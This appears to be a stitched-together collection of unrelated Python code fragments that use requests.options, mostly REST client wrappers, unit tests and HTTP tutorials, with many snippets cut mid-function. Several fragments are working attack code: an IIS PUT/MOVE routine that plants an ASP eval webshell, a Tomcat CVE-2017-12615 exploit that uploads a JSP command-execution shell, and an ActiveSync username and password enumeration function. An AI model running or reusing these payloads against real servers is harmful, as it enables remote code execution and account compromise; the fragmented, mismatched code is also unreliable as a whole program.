def findPuttable():
#Find directories which are puttable
headers = {'user-agent': random.choice(agents).strip(),}
paths = []
try:
for url in foundURLs:
urlPath = url.split('/')
if len(urlPath) > 3:
urlPath.pop()
newURL = '/'.join(urlPath)
if newURL not in paths:
paths.append(newURL)
for path in paths:
resp = None
if authed:
resp = requests.options(path, auth=HttpNtlmAuth(username, password),headers=headers)
else:
resp = requests.options(path,headers=headers)
if resp is not None and resp.status_code == 200:
if 'allow' in resp.headers:
printer('[+] PUT - %s' % (path), GREEN)
except Exception, e:
print e
def upload(file2Upload):
""""""
#Read Cookie.....Damn it I didn't have my supper!
try:
cookies = open(cookiepath, 'r').readline()
#print(cookies)
except:
print('I am hungry, please give me your Cookie!')
exit()
#Get filename
if not os.path.isfile(file2Upload):
print('Not file!')
pass
if os.path.splitext(file2Upload)[1] != '.flv':
print('ERROR: You can only upload .flv file(s)!')
exit()
filename = os.path.basename(file2Upload)
#print(filename)
#Calculate Filesize, since there s 1.4GiB limit
filesize = os.path.getsize(file2Upload)
print('Size of file: ' + str(filesize))
if filesize > (1.4 * 1024 * 1024 * 1024):
print('File larger than 1.4 GiB, unable to upload!')
exit()
#Fetch UploadUrl
request_full = urllib.request.Request('http://member.bilibili.com/get_vupload_url', headers={ 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36', 'Cache-Control': 'no-cache', 'Pragma': 'no-cache' , 'Cookie': cookies,})
try:
response = urllib.request.urlopen(request_full)
except Exception:
print('Cannot get response from server!')
pass
data = response.read()
uploadresponse = json.loads(data.decode('utf-8'))
try: # if error happens...
uploadresponse["error_code"]
except KeyError:
pass
except:
print('ERROR: '+ uploadresponse['error_msg'] + ', ' + str(uploadresponse["error_code"]))
sys.exit() # exit the program
#print(uploadresponse['url'])
#make filename
server_ip = str(uploadresponse['server_ip'])
remote_file_name = str(uploadresponse['file_name'])
#start upload
upload_url = str(uploadresponse['url'])
#print(upload_url)
f = open(file2Upload, 'rb')
c = 0
for piece in read_in_chunks(f):
headers_post = {'content-type': 'multipart/form-data', 'Content-Length': '524288', 'Content-Range': 'bytes ' + str(c * 524288) + '-' + str((c + 1) * 524288) + '/' + str(filesize),}
requests.options(upload_url) #dont really know why
files = {'file': piece}
r = requests.post(upload_url, files=files, headers = headers_post)
c = c + 1
print(str(c * 524288) + '/' + str(filesize) + ' done...')
#video_list = video_list + (str('[vupload]' + remote_file_name + ';' + filename + ';' + server_ip + ';[/vupload]\n'))
print('\n'+'Hope everything is fine. '+ '\n' + '[vupload]' + remote_file_name + ';' + filename + ';' + server_ip + ';[/vupload]')
def __init__(self, host):
self.host = host
self.session = requests.Session()
try:
# Run a request to trigger request's imports.
# We don't care if it works
requests.options(self.host)
except:
pass
def check_user(url, user, password, timeout):
"""Exploit the difference in HTTP responses from the ActiveSync service to identify valid and invalid usernames.
It was also identified that valid accounts with 2FA enabled can be distinguished from valid accounts without 2FA."""
headers = {"MS-ASProtocolVersion": "14.0"}
auth = (user, password)
try:
r = requests.options(url, headers=headers, auth=auth, timeout=timeout)
except Exception as e:
msg = "error checking {} : {}".format(user, e)
if MSF:
module.log(msg, "error")
else:
logging.error(msg)
return user, UNKNOWN, None
status = r.status_code
if status == 401:
return user, password, VALID_USER, r
elif status == 404:
if r.headers.get("X-CasErrorCode") == "UserNotFound":
return user, password, INVALID_USER, r
elif status == 403:
return user, VALID_PASSWD_2FA, r
elif status == 200:
return user, password, VALID_LOGIN, r
return user, password, UNKNOWN, r
def run_request(base_url, url, method="GET", data=None, verbose=False):
"""
Run HTTP request and return the result.
"""
if method not in ("GET", "HEAD", "OPTIONS", "POST", "PUT", "PATCH", \
"DELETE"):
if verbose:
print_error("Unknown method")
return None
full_url = urlparse.urljoin(base_url, url)
if verbose:
print_info("Request url=%s" % (full_url))
print_info("Request method=%s" % (method))
if data is not None:
print_info("Request body=%s" % (data))
try:
response = None
if method == "DELETE":
response = requests.delete(full_url, data=data)
elif method == "HEAD":
response = requests.head(full_url, data=data)
elif method == "OPTIONS":
response = requests.options(full_url, data=data)
elif method == "POST":
response = requests.post(full_url, data=data)
elif method == "PUT":
response = requests.put(full_url, data=data)
elif method == "PATCH":
response = requests.patch(full_url, data=data)
else:
response = requests.get(full_url, data=data)
if verbose:
print_info("Response code=%d" % (response.status_code))
print_info("Response body=%s" % (response.content))
print_info("Response headers=%s" % (response.headers))
return response
except requests.exceptions.ConnectionError:
if verbose:
print_error("Network problem occurred")
return None
except requests.exceptions.HTTPError:
if verbose:
print_error("Invalid HTTP response")
return None
except requests.exceptions.URLRequired:
if verbose:
print_error("Invalid request URL")
return None
except requests.exceptions.TooManyRedirects:
if verbose:
print_error("Too many redirects")
return None
except requests.exceptions.Timeout:
if verbose:
print_error("Connection timed out")
return None
except requests.exceptions.MissingSchema:
if verbose:
print_error("Invalid request URL")
return None
def options(self, uri, params=None, headers=None):
if headers is None:
headers = dict()
headers.update(self._headers)
return requests.options(self._url + uri, params=params, headers=headers)
def OPTIONS(HOST, path='/', PORT=80):
opt = re.compile('Allow.*(GET).*')
request_str = 'options ' + path + ' HTTP/1.1 \r\nuser-agent: MyAwesomeCrawler\r\nconnection: close\r\n\r\n'
# url = urlparse.urlparse(HOST)
# path = url.path
# if path == "":
# path = "/"
# HOST = url.netloc # The remote host
# create an INET, STREAMing socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.30)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# s.setblocking(0)
s.connect((HOST, PORT))
# s.send("GET / HTTP/1.1%s" % ('\r\n\r\n'))
s.send(request_str)
data = (s.recv(1000000))
# print(data)
# https://docs.python.org/2/howto/sockets.html#disconnecting
s.shutdown(1)
s.close()
# print('Received', repr(data))
r = requests.options('http://' + HOST + path, headers={'user-agent':'CLIENT RIW'})
print(r.headers)
return 1 if re.search(opt, str(r.headers)) else 0
def test_can_only_POST_to_upload_URL(self):
response = requests.get(self.VIDEO_UPLOAD_URL)
self.assertEqual(response.status_code, 405)
response = requests.options(self.VIDEO_UPLOAD_URL)
self.assertEqual(response.status_code, 405)
response = requests.put(self.VIDEO_UPLOAD_URL)
self.assertEqual(response.status_code, 405)
def options(self):
"""
Retrieves documentation of REST resource.
If the status code is 200 (OK), returns the documentation. Otherwise,
returns an error.
The response is an object with the following attributes:
+------------+------------------------+
| Attribute | Description |
+============+========================+
| headers | Response headers |
+------------+------------------------+
| data | Resource documentation |
+------------+------------------------+
Link resources are not included in the documentation.
:returns: Resource documentation data.
:rtype: ``EasyDict`` object.
"""
uri = "%s%s" % (self.base_uri, self.endpoint)
resp = requests.options(uri,params=self.auth)
if resp.status_code == 200:
return Response(self.base_uri, self.auth, resp)
else:
raise SoccermetricsRestException(resp.status_code,resp.url)
def test_documentation_siteroot_options(self):
response = requests.options(
self.portal.absolute_url(),
headers={'content-type': 'application/json'},
auth=(SITE_OWNER_NAME, SITE_OWNER_PASSWORD)
)
save_response_for_documentation('siteroot-options.json', response)
def testGetWildcard(self):
# set the Cors header
requests.post(
self.url + "/foo",
headers={
'X-Auth-Token': self.tokenId,
'X-Container-Meta-Access-Control-Allow-Origin': '*',
}).raise_for_status()
# check if the cors header was stored
response = requests.get(
self.url + "/foo",
headers={
'X-Auth-Token': self.tokenId,
})
response.raise_for_status()
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.headers['X-Container-Meta-access-control-allow-origin'],
'*')
# set the Cors header
response = requests.options(
self.url + "/foo/a",
headers={
'X-Auth-Token': self.tokenId,
'Origin': 'http://www.foo.com',
'Access-Control-Request-Method': 'GET',
})
self.assertEqual(response.status_code, 200)
def main():
print('Создаем объект Response, вызывая метод HTTP GET')
response_object = requests.get(BASE_URL + HTTP_METHOD['GET'])
# декодированный текст ответа
print('{}'.format(response_object.text))
print('Создаем объект Response, вызывая метод HTTP PUT')
response_object = requests.put(BASE_URL + HTTP_METHOD['PUT'])
# декодированный текст ответа
print('{}'.format(response_object.text))
print('Создаем объект Response, вызывая метод HTTP DELETE')
response_object = requests.delete(BASE_URL + HTTP_METHOD['DELETE'])
# декодированный текст ответа
print('{}'.format(response_object.text))
print('Создаем объект Response, вызывая метод HTTP HEAD')
response_object = requests.head(BASE_URL + HTTP_METHOD['HEAD'])
# декодированный текст ответа
print('{}'.format(response_object.text))
print('Создаем объект Response, вызывая метод HTTP OPTIONS')
response_object = requests.options(BASE_URL + HTTP_METHOD['OPTIONS'])
# декодированный текст ответа
print('{}'.format(response_object.text))
def do_request(self, http_method, url, headers, body, return_format):
if self.auth_type == 'OAUTH1':
auth_data = self.get_oauth()
else:
auth_data = None
if self.send_json:
# We need to make sure that body is jsonified
try:
body = json.dumps(body)
except TypeError or ValueError:
pass
if http_method.upper() == 'GET':
r = requests.get(url, headers=headers, auth=auth_data)
elif http_method.upper() == 'POST':
r = requests.post(url, data=body, headers=headers, auth=auth_data)
elif http_method.upper() == 'PUT':
r = requests.put(url, data=body, headers=headers, auth=auth_data)
elif http_method.upper() == 'DELETE':
r = requests.delete(url, data=body, headers=headers, auth=auth_data)
elif http_method.upper() == 'OPTIONS':
r = requests.options(url, data=body, headers=headers, auth=auth_data)
else:
raise Exception("Invalid request method")
return self.handle_response(r, return_format)
def requests(self, data):
args = comun.to_dict(data.Args)
info = comun.to_dict(data.Data)
if data.Method == 'get':
params = comun.to_dict(data.Params)
r = requests.get(data.Url, params, **args)
elif data.Method == 'post':
json = comun.to_dict(data.Json)
r = requests.post(data.Url, info, json, **args)
elif data.Method == 'options':
r = requests.options(data.Url, **args)
elif data.Method == 'head':
r = requests.head(data.Url, **args)
elif data.Method == 'put':
r = requests.put(data.Url, info, **args)
elif data.Method == 'patch':
r = requests.patch(data.Url, info, **args)
elif data.Method == 'delete':
r = requests.delete(data.Url, **args)
res = Response()
res.StatusCode = r.status_code
res.Url = r.url
res.Encoding = str(r.encoding)
res.Headers = str(r.headers)
res.Cookies = str(r.cookies)
res.Text = r.text
try:
res.Json = str(r.json())
except ValueError:
res.Json = ''
res.Content = r.content
return res
def _curl(protocol,target,i,timeout=3,searchList=[]):
dic = {}
dic['id'] = str(i)
dic['host'] = target.split(':')[0]
dic['search'] = []
url = protocol + "://" +target.strip(' ')
try:
result = requests.get(url, timeout=int(timeout),verify=False)
soup = BeautifulSoup(result.text,'lxml')
dic['target'] = url
dic['status'] = str(result.status_code)
dic['flag'] = True
dic['host'] = target
mytitle = soup.title.string
content = result.text
for searchkey in searchList:
if searchkey in mytitle.encode(result.encoding) or searchkey in content.encode(result.encoding):
dic['search'].append(searchkey)
if mytitle == None or mytitle =='':
dic['title'] = "None Title"
else:
dic['title'] = mytitle.encode(result.encoding)
except:
dic['title'] = "Curl Failed"
dic['status'] = "0"
dic['target'] = target
dic['host'] = target
dic['flag'] = False
url = protocol + "://" +target.strip(' ')
try:
result1 = requests.options(url+"/testbyah", verify=False,timeout=int(timeout))
dic['head_allow'] = result1.headers['Allow']
except:
dic['head_allow'] = "Not Allow"
return dic
def test_mocker_options(self, m):
mock_obj = m.options(self.URL, text=self.TEXT)
self.assertResponse(requests.options(self.URL))
self.assertTrue(mock_obj.called)
self.assertTrue(mock_obj.called_once)
self.assertTrue(m.called)
self.assertTrue(m.called_once)
def req(param, header, total_time_list, length_list):
try:
url, method, data = param
start = time.time()
if method == 'GET':
r = requests.get(url)
elif method == 'POST':
data = data_parse(data)
r = requests.post(url, data)
elif method == 'DELETE':
r = requests.delete(url)
elif method == 'PUT':
data = data_parse(data)
r = requests.put(url, data)
elif method == 'HEAD':
r = requests.head(url)
elif method == 'OPTIONS':
r = requests.options(url)
#print r.content
total_time = time.time() - start
if r.ok:
if not header['server']:
header['server'] = r.headers['Server'] if 'Server' in r.headers else 'unknown'
if 'Content-Length' in r.headers:
length = float(r.headers['Content-Length'])
else:
length = len(r.content)
total_time_list.append(total_time)
length_list.append(length)
except Exception, e:
logging.warn('request failed, domain:%s ; :%s' % (url, e), exc_info=1)
def run(target):
"IIS PUT"
results = []
url = "http://" + target + "/"
try:
r = requests.options(url, timeout=5)
except Exception:
pass
else:
r.close()
if r.headers.get("public") and r.headers.get("allow") and "PUT" in r.headers.get("public"):
try:
r = requests.put(url+"test.txt", data='<%eval request("chu")%>', timeout=5)
except Exception:
pass
else:
r.close()
if r.status_code < 400:
try:
r = requests.request(method="MOVE",
url=url+"test.txt",
headers={"Destination":url+"test.asp;.jpg"},
timeout=5
)
except Exception:
pass
else:
r.close()
if r.status_code < 400:
results.append(url+"test.asp;.jpg")
return results
def request(self):
resposta = ''
try:
metodo = self.metodo.get()
headers = self.get_headers()
if metodo == Rest.POST:
data = self.get_data()
resposta = r.post(self.url.get(), headers=headers, data=data)
elif metodo == Rest.GET:
resposta = r.get(self.url.get(), headers=headers)
elif metodo == Rest.PUT:
data = self.get_data()
resposta = r.put(self.url.get(), headers=headers, data=data)
elif metodo == Rest.DELETE:
resposta = r.delete(self.url.get(), headers=headers)
elif metodo == Rest.OPTIONS:
resposta = r.options(self.url.get(), headers=headers)
elif metodo == Rest.TRACE:
resposta = r.trace(self.url.get(), headers=headers)
elif metodo == Rest.HEAD:
resposta = r.head(self.url.get(), headers=headers)
except Exception as ex:
print(ex)
resposta = ex.message
self.tratar_resposta(resposta)
self.retorno.delete(0.0,tkinter.END)
try:
load = json.loads(resposta.text)
self.retorno.insert(tkinter.END, json.dumps(load, indent=4, sort_keys=True) )
except:
soup = BeautifulSoup(resposta.text)
self.retorno.insert(tkinter.END, soup.prettify() )
def test_can_only_GET_from_poll_URL(self):
response = requests.post(self.POLL_URL)
self.assertEqual(response.status_code, 405)
response = requests.options(self.POLL_URL)
self.assertEqual(response.status_code, 405)
response = requests.put(self.POLL_URL)
self.assertEqual(response.status_code, 405)
def options(self, path, params={}):
headers = {'Accept': 'application/json', 'User-Agent':
self.SDK_VERSION, 'Content-type': 'application/json'}
uri = self.make_path(path)
response = requests.options(
uri, params=urlencode(params), headers=headers)
return response
def rest_req(self, action="GET", path="", data=None, timeout=10):
if path[0] == "/":
path = path[1:len(path)]
url = "/".join([self.rest_url, path])
headers = {"Accept": "application/json", "Content-type": "application/json"}
if type(data) is dict:
data = json.dumps(data)
print data
if action == "POST":
req = requests.post(url, data=data, auth=(self.rest_username, self.rest_password), headers=headers)
elif action == "PUT":
req = requests.put(url, data=data, auth=(self.rest_username, self.rest_password), headers=headers)
elif action == "DELETE":
req = requests.delete(url, data=data, auth=(self.rest_username, self.rest_password), headers=headers)
elif action == "HEAD":
req = requests.head(url, data=data, auth=(self.rest_username, self.rest_password), headers=headers)
elif action == "OPTIONS":
req = requests.options(url, auth=(self.rest_username, self.rest_password), headers=headers)
else: # Assume GET
req = requests.get(url, auth=(self.rest_username, self.rest_password), headers=headers)
if req.status_code == 200:
if len(req.text) > 0:
return req.json()
else:
return {}
else:
print req.content
req.raise_for_status()
def test_method_options(self):
r = requests.options(self.login_url, data = {
'mob': self.mob,
'code': '123456'
})
self.assertEqual(r.status_code, 200,
msg = 'response status code equals to 200 use method options.')
def request(self, method, request="?", headers=None, postData={}, domain="discordapp.com", files={}):
while(time.time() - self.lastRequest < 1):
time.sleep(0.025)
url = 'https://{}/api/{}'.format(domain, request)
response = None
if(method.lower() in ["post", "get", "delete", "head", "options", "put"]):
self.lastRequest = time.time()
if(method == "POST"):
response = requests.post(url, files=files, json=postData, headers=headers)
elif(method == "GET"):
response = requests.get(url, postData, headers=headers)
elif(method == "PUT"):
response = requests.put(url, postData, headers=headers)
elif(method == "DELETE"):
response = requests.delete(url, postData, headers=headers)
elif(method == "OPTIONS"):
response = requests.options(url)
elif(method == "HEAD"):
response = requests.head(url)
elif(method == "UPDATE"):
response = requests.update(url, postData, headers=headers)
else:
raise Exception("Invalid HTTP request method")
if(response.status_code not in range(200, 206)):
raise Exception("API responded with HTTP code " + str(response.status_code) + "\n\n" + response.text)
else:
if(response.text):
returnData = json.loads(response.text)
return returnData
else:
return None
def get_options_information(url):
"""
Make an OPTIONS HTTP request and try to find useful information
"""
# banner_print("HTTP OPTIONS",1)
details = {}
interesting_methods = []
allowed_methods = []
try:
option = requests.options(url,allow_redirects=args.follow_redirects,verify=args.verify_cert,headers=useragent,timeout=1)
allowed_methods = [method.strip() for method in option.headers['allow'].split(",")]
except:
return None
else:
for method in allowed_methods:
if method not in known_methods:
interesting_methods.append(method)
if interesting_methods:
n_print("Interesting HTTP Methods:")
details['interesting-methods'] = interesting_methods
good_print("\t"+",".join(interesting_methods))
if 'dav' in option.headers:
good_print("WebDAV Enabled " + option.headers['dav'])
details['webdav'] = option.headers['dav']
return details
def get_options(self, url, method):
"""
Contact the LISA API to know the format of arguments
:param url: The url to call for the options
:param method: The method which will be used for the Intent
:return: A dictionnary of arguments and their type of field
"""
url_dict = {}
for outcome in self.nlp_json['outcomes']:
for entity in outcome['entities']:
plugin, intent = entity.split('_', 1)
url_dict[intent] = outcome['entities'][entity][0]['value']
self.lisa_api_intent = ''.join([self.lisa_api_url, url]).format(**url_dict)
r = requests.options(self.lisa_api_intent,
headers={"Authorization": self.lisa_auth,
"content-type": "application/json"})
options = r.json()
self.parsed_args = {}
if method.upper() in options['actions']:
for argument in options['actions'][method.upper()]:
value = self._get_info_field(options['actions'][method.upper()][argument])
if value:
self.parsed_args[argument] = value
return self.parsed_args
def api_request(self, api_module, view_name, method='GET', headers=None, payload=None, files=None, auth=None):
"""
:param api_module: the api module instantiated on the given instance
:param view_name: a view in the given api module
:param method: the HTTP request method. defaults to GET
:param payload: any data that needs to be sent to the view. defaults to None. should be a dict
:return: returns the response content or json depending on the response content-type
"""
url = 'https://%s.nebrios.com/api/v1/%s/%s' % (self.instance_name, api_module, view_name)
r = None
if method == 'POST':
r = requests.post(url, data=payload, files=files, headers=headers, auth=auth)
elif method == 'GET':
r = requests.get(url, params=payload, headers=headers, auth=auth)
elif method == 'PUT':
r = requests.put(url, data=payload, headers=headers, auth=auth)
elif method == 'DELETE':
r = requests.delete(url, headers=headers, auth=auth)
elif method == 'HEAD':
r = requests.head(url, headers=headers, auth=auth)
elif method == 'OPTIONS':
r = requests.options(url, headers=headers, auth=auth)
else:
return 'Incorrect Method.'
print r
if 'application/json' in r.headers['content-type']:
return r.json()
return r.content
def test_proxy_fetch_options_request(self, scheme):
expected_origin = '{0}://example.com'.format(scheme)
res = requests.options('{0}://pywb.proxy/proxy-fetch/{1}'.format(scheme, expected_origin),
headers=dict(Origin=expected_origin),
proxies=self.proxies, verify=self.root_ca_file)
assert res.ok
assert res.headers.get('Access-Control-Allow-Origin') == expected_origin
def test_proxy_worker_options_request(self, scheme):
expected_origin = '{0}://example.com'.format(scheme)
res = requests.options('{0}://pywb.proxy/static/autoFetchWorkerProxyMode.js'.format(scheme),
headers=dict(Origin=expected_origin),
proxies=self.proxies, verify=self.root_ca_file)
assert res.ok
assert res.headers.get('Access-Control-Allow-Origin') == expected_origin
def check_webdav(self):
headers = {
'Host': 'www.beihua.edu.cn'
}
response = requests.options('http://www.beihua.edu.cn', headers=headers)
print response.headers
import sys, requests
import json
host = "http://localhost:10000/wikispeech/"
r = requests.options(host)
api_info = r.json()
supported_languages = api_info["GET"]["parameters"]["lang"]["allowed"]
def test_default_settings():
#1) Test default settings for supported languages
for lang in supported_languages:
print("START: %s" % lang)
# GET: curl "http://localhost:10000/wikispeech/?lang=en&input=test."
r = requests.get("%s?lang=%s&input=test." % (host, lang))
print(r.text)
print("DONE: %s" % lang)
def test_all_settings():
#2) Test all settings for supported languages.
#foreach language
#foreach textproc_config
#foreach voice
#test
for lang in supported_languages:
print("START: %s" % lang)
def test_mocker_options(self, m):
mock_obj = m.options(self.URL, text=self.TEXT)
self.assertResponse(requests.options(self.URL))
self.assertTrue(mock_obj.called)
#
# Contributors:
# Pavel Tisnovsky
#
import requests
import json
# adresa s testovaci REST API sluzbou
URL = "https://httpbin.org/get"
# hlavicka posilana v dotazu
headers = {'accept': 'application/json'}
# poslani HTTP dotazu typu OPTIONS
response = requests.options(URL, headers=headers)
# precteni hlavicek
headers = response.headers
# vypis vsech hlavicek
print("Headers:")
for header_name, header_value in headers.items():
print("{:40s} {}".format(header_name, header_value))
print("-" * 60)
print("Content:")
# vypis tela odpovedi
return "http://" + ur
url = raw_input("Enter an URL: ")
url = addhttp(url)
flag = True
getbool = True
try:
rget = requests.get(url)
except:
getbool = False
print "GET Err"
try:
roption = requests.options(url)
except:
print "OPTIONS Err"
while flag:
if (getbool == True):
print "\n\n\n\n"
print "0. Show all\n1. Show server application\n2. Show list of methods\n3. Show list of cookies\n4. Show cache information\n5. Show authentication information\n6. Show status\n7. Show type of connection\n8. End\n9. Change URL"
num = input("Choose a number: ")
print "\n"
else:
getbool = True
num = 9
if (num == 1 or num == 0):
try:
print "server app: ", rget.headers['server']
def is_deployment_available(params):
url = get_deployment_url(params)
response = requests.options(url)
return response.status_code == 200
def get_upload_id(url):
requests.options(url, headers=headers_op("POST"))
resp = requests.post(url, headers=headers_up()).json()
return resp["UploadId"]
def http_其他请求类型():
r = requests.post("http://httpbin.org/post")
r = requests.put("http://httpbin.org/put")
r = requests.delete("http://httpbin.org/delete")
r = requests.head("http://httpbin.org/get")
r = requests.options("http://httpbin.org/get")
import requests
html = requests.options("https://image.baidu.com/search/acjson?tn=resultjson_com&ipn=rj&ct=201326592&is=&fp=result&queryWord=%E5%A3%81%E7%BA%B8&cl=2&lm=-1&ie=utf-8&oe=utf-8&adpicid=&st=-1&z=0&ic=0&hd=0&latest=0©right=0&word=%E5%A3%81%E7%BA%B8&s=&se=&tab=&width=&height=&face=0&istype=2&qc=&nc=1&fr=&expermode=&force=&cg=wallpaper&pn=30&rn=30&gsm=1e&1595690436389=")
# html.encoding="utf-8"
if html.status_code == 200:
content = html.json()['data']
for item in content:
try:
print(item['replaceUrl'][1]['ObjURL'])
except:
print("无原图")
# print(html.text)
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b,0,a));
}
out.print("</pre>");
}
%>'''
if len(sys.argv) < 2:
print "python tomcat-cve-2017-12615.py http://127.0.0.1:8080/"
sys.exit()
url = sys.argv[1]
r = requests.options(url=url + '/123')
header = r.headers
#print header
if 'PUT' in header['Allow']:
filename = '/' + str(random.randint(666, 666666)) + '.jsp/'
#print filename
r = requests.put(url=url + filename, data=body)
#print r.status_code
if r.status_code == 201:
print 'create shell success: ' + url + filename[:-1]
else:
print 'error'
def delete_request():
print('\n***** DELETE request EXAMPLE ***')
resp = requests.options('https://httpbin.org/delete')
print(httpstatus(resp.status_code))
pprint(resp.text)
def options_request():
print('\n***** OPTIONS request, ACCESS CONTROL methods!!! ***')
resp = requests.options('https://httpbin.org/get')
pprint(type(resp))
pprint(resp.headers)
import requests
import json
r = requests.get('http://www.baidu.com/')#不带参数的get请求
r1 = requests.get('http://www.baidu.com/',params={'wd':'123'})#带参数的get请求
requests.post('http://www.baidu.com/',data=None,json=None)#post请求
requests.put('http://www.baidu.com/')#put请求
requests.delete('http://www.baidu.com/')#delete
requests.head('http://www.baidu.com/')
requests.options('http://www.baidu.com/')
# 为url传递参数
urlParams = {"key":'value'}
r = requests.get('http://www.baidu.com/',params=urlParams)
# print(type(r))
# print(r.url)# 打印url字符串 http://www.baidu.com/?key=value
# response
# print(r.encoding)#获取当前编码
# r.encoding = 'utf-8'#设置编码为utf-8
# print(r.text)#将encoding解析后的内容,字符串方式的响应体,会自动根据响应头部的字符编码进行解码
# print(r.content)#以字节形式返回,字节方式的响应体,会自动为你解码gzip和deflate压缩
# print(r.headers)#字典对象存储响应头,字典键不区分大小写,若键不存在则返回None
# print(r.status_code)
# print(r.raw)#返回原始响应体,也就是urllib的response对象,使用r.raw.read()
# print(r.ok)# 查看r.ok的布尔值,可以知道是否登录成功
# # 特殊方法
def res_upload(url, parts):
requests.options(url, headers=headers_op("POST"))
requests.post(url, headers=headers_res(), data=parts)
def options(url, **kwargs):
return requests.options(url, **kwargs)
def upload_file(self, url, file):
requests.options(url, headers=headers_op("PUT"))
requests.put(url,
headers=headers_up(self.get_size(self.video), "put"),
data=file)
params=[('q', 'requests+language:python')],
)
print(response.json())
# To customize headers, you pass a dictionary of HTTP headers to get() using the headers parameter.
response = requests.get(
'https://api.github.com/search/repositories',
params={'q': 'requests+language:python'},
headers={'Accept': 'application/vnd.github.v3.text-match+json'},
)
print(response.json())
#
#
# Aside from GET, other popular HTTP methods include POST, PUT, DELETE, HEAD, PATCH, and OPTIONS.
# requests provides a method, with a similar signature to get(), for each of these HTTP methods
response = requests.post('https://httpbin.org/post', data={'key': 'value'})
# data takes a dictionary, a list of tuples, bytes, or a file-like object.
response = requests.put('https://httpbin.org/put', data={'key': 'value'})
response = requests.delete('https://httpbin.org/delete')
response = requests.head('https://httpbin.org/get')
response = requests.patch('https://httpbin.org/patch', data={'key': 'value'})
response = requests.options('https://httpbin.org/get')
# If, however, you need to send JSON data, you can use the json parameter.
# When you pass JSON data via json, requests will serialize your data and add the correct Content-Type header for you.
response = requests.post('https://httpbin.org/post', json={'key': 'value'})
# httpbin.org is a great resource created by the author of requests, Kenneth Reitz.
# It is a service that accepts test requests and responds with data about the requests.
anchor=convert_text_to_anchor_url(example['title']),
description=example['title'],
parameter=endpoint['endpoint_parameter'])
# build attribute description table
markdown_output += '''
### Object Attributes
Attribute | Type | Readonly | Nullable | Has Default
--- | --- | --- | --- | ---
'''
# make HTTP OPTIONS call to get object information
url = config['api_base_url'] + endpoint['endpoint_url']
response = requests.options(url,
auth=(username, password),
headers={'Origin': config['api_base_url']})
# build attribute table
attributes = response.json()
attributes = collections.OrderedDict(sorted(attributes.items()))
for attribute, value in attributes.iteritems():
attr_type = value['type']
if attr_type == 'uom' and value['unit']:
attr_type += ': ' + convert_unit_name(value['unit'])
readonly = '•' if value['read_only'] is True else ' '
nullable = '•' if value['nullable'] is True else ' '
has_default = '•' if value['has_default'] is True else ' '
markdown_output += '''`{attribute}` | {type} | {readonly} | {nullable} | {has_default}
'''.format(attribute=attribute,
def options(self, *args, **kwargs):
return requests.options(*self.update_args(args),
**self.update_kwargs(kwargs))
print g.read() # print "this is for item in g:" # for item in i: # print "me is here" # print item ======= print requests.head(direct_dl) print requests.get(direct_dl) print requests.options(direct_dl) print requests.put(direct_dl) r = requests.head(direct_dl) x = urllib.urlretrieve(direct_dl) print "this is x:" print x print "this is for line in x:" for line in x: print line g = urllib.urlopen(direct_dl, 'r') print "this is for item in g:"
def optionsRequest(self):
resp = requests.options(self.main_page,
params=url_params,
proxies=proxies)
print(resp)
import requests
r = requests.get('https://api.github.com/events')
print r
r = requests.post('http://httpbin.org/post', data = {'key':'value'})
print r
r = requests.put('http://httpbin.org/put', data = {'key':'value'})
print r
r = requests.delete('http://httpbin.org/delete')
print r
r = requests.head('http://httpbin.org/get')
print r
r = requests.options('http://httpbin.org/get')
print r
import json
import requests
from commons.response import Response
from logging import getLogger
logger = getLogger(__name__)
REQUEST_METHODS = {
'POST': lambda url, params, data, headers: requests.post(url, data=json.dumps(data), headers=headers),
'GET': lambda url, params, data, headers: requests.get(url, params, headers=headers),
'PUT': lambda url, params, data, headers: requests.put(url, data=json.dumps(data), headers=headers),
'HEAD': lambda url, params, data, headers: requests.head(url, headers=headers),
'OPTIONS': lambda url, params, data, headers: requests.options(url, headers=headers),
'PATCH': lambda url, params, data, headers: requests.options(url, data=json.dumps(data), headers=headers),
'DELETE': lambda url, params, data, headers: requests.options(url, headers=headers)
}
class API(object):
"""
Generic API class which can be inherited to create an api integration
by merely defining the 'URI' and 'ENDPOINTS'
eg -
URI = 'http://www.google.com/'
AUTH_TOKEN = "TEST_TOKEN"
ENDPOINTS = {
'FETCH_PRODUCT_DETAILS': {
'endpoint': 'api/v1/product/{}/',
def board(request, codename):
"""
Company board page.
Same permissions as the company home page.
"""
# Check the user is active
if not request.user.get_profile().status == UserProfile.VERIFIED:
raise PermissionDenied
organization = get_object_or_404(Organization, codename=codename)
context = {}
# Load the Company Profile for the user's Active Space
space = request.user.get_profile().space
context['space'] = space
company = CompanyProfile.objects.get(space=space,
organization=organization)
context['company'] = company
context['staff'] = organization.members.all()
context['BING_MAPS_KEY'] = settings.BING_MAPS_KEY
# check the user is a member of the space this organization belongs to
if not request.user in space.members:
raise PermissionDenied
# Authentication is Token-based
headers = {
'referer': settings.API_HOST,
'content-type': 'application/json',
# use the logged-in user authorization token
'authorization': 'Token {}'.format(request.user.get_profile().token)
}
# Make an OPTIONS request to retrieve the full list of Notices for this user
cookies = {
'csrftoken': request.COOKIES['csrftoken'],
'sessionid': request.COOKIES['sessionid']
}
url = "https://{}/api/notices".format(request.META['HTTP_HOST'])
r = requests.options(url, verify=False, cookies=cookies)
try:
context['notices'] = json.dumps(
json.loads(r.text)['results']['notices'])
except:
context['notices'] = '{}'
# Load company Notices
params = {'company': organization.codename}
response = requests.get(url, verify=False, headers=headers, params=params)
context['data'] = response.text
# Add statistics
context['stats'] = {
'members': organization.members.all(),
'notices': json.loads(response.text),
'expertise': organization.expertise.all(),
}
# load template
t = loader.get_template('nirit/company_profile_board.html')
c = RequestContext(request, context)
return HttpResponse(t.render(c))
import os
import ast
import argparse
import json
import dbm
import urllib
import requests
config_file = os.path.join(os.getenv("HOME"), '.pyapi')
methods = {
'post' : lambda url, data: requests.post(url, data=data),
'get' : lambda url, data : requests.get(url, params=data),
'put' : lambda url, data : requests.put(url, data=data),
'delete' : lambda url, data : requests.delete(url, data=data),
'options' : lambda url, data : requests.options(url, data=data)
}
def dump_config():
"""
prints out the saved configuration
"""
